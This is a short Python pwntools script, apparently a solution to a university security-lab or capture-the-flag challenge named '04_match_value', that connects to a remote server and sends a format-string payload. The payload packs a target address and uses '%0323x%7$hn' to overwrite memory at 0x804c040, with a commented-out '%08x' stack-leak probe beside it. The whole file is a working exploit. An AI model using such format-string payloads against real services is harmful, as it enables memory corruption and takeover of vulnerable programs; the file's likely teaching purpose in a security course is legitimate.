from pwn import remote, process, p32

HOST = "mustard.stt.rnl.tecnico.ulisboa.pt"
PORT = 25194

conn = remote(HOST, PORT)
#conn = process("04_match_value")
#input()

tgt_addr = p32(0x804c040)

#327 - 4(ptr) = 323
pl = tgt_addr+b"%0323x%7$hn\n"
#pl = "AAAA.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x\n"

conn.send(pl)
while conn.connected():
	print(chr(conn.recv(1)[0]), end="", flush=True)